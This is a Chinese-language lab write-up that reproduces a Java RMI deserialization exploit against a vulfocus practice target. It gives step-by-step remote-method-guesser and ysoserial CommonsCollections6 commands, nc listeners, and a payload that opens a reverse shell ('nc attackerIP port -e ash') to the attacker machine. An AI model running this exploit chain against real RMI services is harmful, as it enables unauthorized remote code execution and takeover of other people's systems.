0x00 實驗環境
攻擊機:Ubuntu
靶場:vulfocus搭建的靶場環境
0x01 影響版本
使用nmap,探測到有java rmi服務的都可以測試一下:

0x02 漏洞復現
(1)訪問存在的漏洞頁面

(2)首先需要安裝一下這個工具:
https://github.com/qtc-de/remote-method-guesser

git clone https://github.com/qtc-de/remote-method-guesser
cd remote-method-guesser
mvn package
出現success即可:

(2)在opt目錄下下載並創建文件夾目錄如下所示(主要用於第5步,反彈shell):
創建opt/ysoserial/target/,然后去github上搜索這個文件:ysoserial-0.0.6-SNAPSHOT-all.jar(自己搜索即可,不管是測shiro還是啥的都有的)

(3)在target目錄下執行漏掃命令:
cd target
java -jar rmg-3.3.0-jar-with-dependencies.jar 肉雞IP 肉雞端口

報錯的話就加個--ssl

發現了就可以開展測試。
(4)target執行數據接收命令:
java -jar rmg-3.3.0-jar-with-dependencies.jar 肉雞IP 肉雞端口 reg AnTrinh 攻擊機IP:攻擊機端口 --ssl

同時攻擊機也開啟監聽:
nc -lvvp 8989

監聽成功會返回"JRMIK"字樣的數據
(5)反彈shell:
攻擊機開三個窗口:
第一個執行:
java -jar rmg-3.3.0-jar-with-dependencies.jar 肉雞IP 肉雞端口 reg AnTrinh 攻擊機IP:攻擊機端口A --ssl

第二個執行:
java -jar rmg-3.3.0-jar-with-dependencies.jar 0.0.0.0 攻擊機端口A listen CommonsCollections6 "nc 攻擊機IP 攻擊機端口B -e ash" --ssl

第三個執行:
nc -lvp 攻擊機端口B

成功反彈shell!
0x03 參考文獻
https://github.com/qtc-de/remote-method-guesser
大哥的悉心指點。
0x04 免責聲明
本漏洞復現文章僅用於學習、工作與興趣愛好,並立志為網絡安全奉獻一份力量,凡是利用本博客相關內容的無良hackers造成的安全事故均與本人無關!
